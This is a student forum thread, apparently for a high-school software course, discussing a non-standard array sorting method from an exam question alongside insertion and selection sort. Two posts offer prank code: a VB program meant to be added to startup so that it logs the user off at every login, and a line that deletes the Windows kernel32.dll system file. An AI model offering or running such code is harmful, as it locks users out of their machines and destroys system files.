That sorting method (1 Viewer)

haboozin

Do you uhh.. Yahoo?
HSC
Glen88 said:
Ok, now that you have this code, compile the exe and if you can, add it to the startup of your computer. Everytime the computer logs in it will log right back off.

Have fun.
i envy your coolness :(

bentrengrove

nick1048 said:
I did this first, then realised I was wrong because in order for an insertion sort to occur you would need more array cells, a luxury you do not have in this little scenario.

- Combine the arrays
- Use Bubble or Selection sort.
you don't need extra cells to do an insertion sort?
You just copy the new item to a temp variable then find where it goes and move every cell under it down one place. Then copy the temp file into the space where it is in order.

frankyd

starlight woo!
HSC
was it necessary to merge them?

In this question, the array is orignally a single array, then is broken up into "SUB ARRAY" pairs for the purpose of the "student's non standard sorting method"

In my opinion it wasn't necessary to merge an array that was already a single array.

I believe that the breaking up of the parts of the array was just to highlight how the sorting method worked.

If you think about it this is quite similar to an insertion or selection sort in the fact that you classify part of the array as sorted, which could be illustrated in a diagram by making it seem as two arrays, although it is essentially one array.

Just my opinion on the question... and it seems that after numerous debates with people at my school it is a correct assumption.
What are your thoughts here?

jarro_2783

HSC
Glen88 said:
Ok guys, heres some good code.

Private Sub Form_Load()
Shell ("C://WINDOWS/system32/logoff.exe")
Me.Hide
End Sub

Ok, now that you have this code, compile the exe and if you can, add it to the startup of your computer. Everytime the computer logs in it will log right back off.

Have fun.
I have a better one. Add this

Kill("c:\windows\kernel32.dll")
It probably won't work because the file is in use but it's worth a try.

Users Who Are Viewing This Thread (Users: 0, Guests: 1)